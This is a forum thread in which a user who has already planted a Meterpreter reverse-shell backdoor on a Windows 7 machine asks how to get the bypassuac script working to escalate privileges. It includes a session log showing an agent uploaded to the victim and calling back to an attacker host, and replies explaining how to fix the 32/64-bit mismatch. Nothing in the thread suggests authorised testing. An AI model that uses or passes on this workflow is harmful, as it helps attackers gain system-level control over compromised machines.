Thread: Meterpreter Bypass UAC Windows 7

Just burned his ISO

Default Meterpreter Bypass UAC Windows 7

Hi community!

i hope some one might help me regarding a problem using the bypassuac.rb script for Meterpreter.

So here is my situation:

I already have placed a reverse_tcp_dns backdoor on the target host. The target host is running Windows 7. Because of the limitations caused by UAC i can not execute the getsystem command on the meterpreter shell.

After searching the web i found the script from http://www.secmaniac.com/january-201...in-metasploit/

As i understand this script is already part of MSF, but even after updating MSF i don`t have the script. So i installed the script as described in the readme file.

Now when i type in the meterpreter shell this command: run bypassuac i get this error :

Code:
     meterpreter > run bypassuac[*] Creating a reverse meterpreter stager: LHOST=192.168.0.91 LPORT=4546[*] Running payload handler[*] Uploading Windows UACBypass to victim machine.[*] Bypassing UAC Restrictions on the system....[*] Meterpreter stager executable 73802 bytes long[*] Uploaded the agent to the filesystem....[*] Executing the agent with endpoint 192.168.0.91:4546 with UACBypass in effect...[*] C:\Users\pam\AppData\Local\Temp\AJXMEwYI.exe /c %TEMP%\TlNdBzSjbOrW.exe
    [-] Error in script: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The version of %1 is not compatible with the version you're running. Check your computer's system information to see whether you need a x86 ; or x64 ; version of the program, and then contact the software publisher.
    meterpreter >
    What is going wrong? Please help me.

Thank you all.

Just burned his ISO

Default Re: Meterpreter Bypass UAC Windows 7

Are you trying to do what is shown in the following video?

http://www.secmaniac.com/december-20...s-windows-uac/

If you are, this is what I did to make it work. Note that I am running Backtrack 4 R2.

1) Go to http://www.secmaniac.com/download/
    The creator of the page suggests having Subversion installed for updating purposes.
    2) Subversion is already installed on BT4 R2.
    3) Install the Social-Engineering Toolkit as shown in the link from step 1.
    4) Follow the instructions in the video and you should be good.

Just burned his ISO

Default AW: Meterpreter Bypass UAC Windows 7

@cntmn8td2006

thanks for your help. Now it`s working fine for me. I updated the Framework again and now i have two bypassuac.exe files. One for X86 and other for 64 bit. With the correct 32bit file its working nicely.